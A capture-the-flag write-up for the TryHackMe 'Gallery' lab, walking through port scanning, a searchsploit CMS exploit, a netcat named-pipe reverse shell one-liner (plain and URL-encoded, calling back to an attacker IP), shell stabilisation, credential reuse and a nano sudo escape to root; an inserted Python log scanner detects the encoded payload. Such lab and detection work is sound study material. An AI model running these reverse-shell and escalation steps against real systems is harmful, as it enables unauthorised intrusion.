TryHackMe: Gallery

Today we will take a look at TryHackMe: Gallery. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Question: How many ports are open?

Command: sudo nmap -sS -sC -sV -oN nmap/initial

Question: What’s the name of the CMS?

Answer: S***** I**** G******

I searched for a suitable exploit and found one.

Let’s exploit.

Command: locate

Command: searchsploit -m /usr/share/exploitdb/exploits/php/webapps/

Command: python

Get Reverse Shell

Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f

But first let’s encode

Command: rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.8.223.65%204242%20%3E%2Ftmp%2Ff%0A
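Seen from the defender's side, the encoded command above leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original writeup: it URL-decodes request query strings and alerts when the indicators of this named-pipe reverse shell co-occur. The log lines, request path, parameter name and addresses are constructed, and it assumes the payload arrives in a GET query string logged in common/combined format.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Tokens of the named-pipe reverse shell shown above, matched after decoding.
PATTERNS = {
    "mkfifo": re.compile(r"\bmkfifo\s+\S+"),
    "interactive_shell": re.compile(r"/bin/(?:ba)?sh\s+-i\b"),
    "nc_connect": re.compile(r"\b(?:nc|ncat|netcat)\s+\S+\s+\d{1,5}\b"),
}

# Common/combined log format: ... "METHOD target PROTO" status ...
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are also normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return sorted names of the patterns found in the request's query string."""
    m = REQUEST.search(line)
    if not m:
        return []
    query = decode_fully(urlsplit(m.group("target")).query)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(query))

def is_alert(hits):
    """Alert only when at least two indicators co-occur, to limit false positives."""
    return len(hits) >= 2

# Constructed sample log lines (documentation-range addresses, hypothetical path and parameter).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /app/page.php?cmd=rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.0.2.10%204242%20%3E%2Ftmp%2Ff%0A HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /docs?q=mkfifo%20manual HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hits = scan_line(line)
        if is_alert(hits):
            print("ALERT", hits, line.split(" ", 1)[0])
```

Requiring two indicators keeps a lone mention of `mkfifo` (third sample line) from alerting while the full one-liner still does.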

Enter these commands after receiving the Reverse Shell

Command: script /dev/null -c bash

Command: export TERM=xterm

Command: ctrl+z

Command: stty raw -echo ; fg

Command: reset

Let’s enumerate the machine with

Here we found the necessary credentials.

Let’s change the user.

Command: su mike

Privilege Escalation

Let’s look at the file

Here we can use nano to get a shell. Let’s take a look at this

Command: sudo -u root /bin/bash /opt/

Command: read

Command: CTRL+R

Command: CTRL+X

Command: reset; sh 1>&0 2>&0

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”




Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.

Al1z4deh:~# echo "Welcome"
